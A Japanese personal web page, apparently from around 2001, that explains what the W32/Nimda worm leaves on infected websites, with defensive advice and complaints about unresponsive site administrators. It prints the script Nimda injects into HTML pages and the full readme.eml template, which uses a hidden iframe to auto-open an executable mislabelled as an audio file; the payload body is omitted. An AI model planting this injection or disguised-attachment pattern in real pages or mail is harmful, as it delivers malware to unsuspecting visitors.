W32/Nimdaのお土産

どこにも記述がないのでとりあえず煮無駄さんがどの様なおみやげをホームページ上に置いてくれるのかを説明しましょう。(悪用しちゃダメよ)感染後の動作については他のホームページを見てね。感染させて試すなんて嫌でっす。

まず感染するとhtmlに下記ソースを片っ端から追加します。

<html><script language="JavaScript">

window.open("readme.eml", null, "resizable=no,top=6000,left=6000")

</script></html>

そして、下記内容のreadme.emlというファイルを置いてくれます。
これはIE5.5 sp1 以前のIEのバグを突いた物らしく確認無しにいきなり添付ファイルまで開くらしいです。(動作は未確認)
それにしても添付readme.exeがContent-Type: audio/x-wavってのが憎いですよねぇ。当然開いたって音は出ないと思いますけどね。

readme.emlの内容
MIME-Version: 1.0
Content-Type: multipart/related;
type="multipart/alternative";
boundary="====_ABC1234567890DEF_===="
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1

--====_ABC1234567890DEF_====
Content-Type: multipart/alternative;
boundary="====_ABC0987654321DEF_===="

--====_ABC0987654321DEF_====
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable


<HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>
<iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0>
</iframe></BODY></HTML>
--====_ABC0987654321DEF_====--

--====_ABC1234567890DEF_====
Content-Type: audio/x-wav;
name="readme.exe"
Content-Transfer-Encoding: base64
Content-ID: <EA4DMGBP9p>

(添付実体は省略)

--====_ABC1234567890DEF_====

これを見てもらえば分かりますが、当面はJavaScriptは切っておきましょう。今後の一番の対策はIEとOutlook Expressは使わないって事でしょうかねぇ。
それにしてもMSNも感染したって言うんですから呆れてものも言えません。そうそう、また感染したホームページの管理者宛にメールで警告しましたけど、どこからも返事来ません。CodeRedの教訓も反映出来ないような管理者は礼儀も知らないらしいです。

TOPに戻る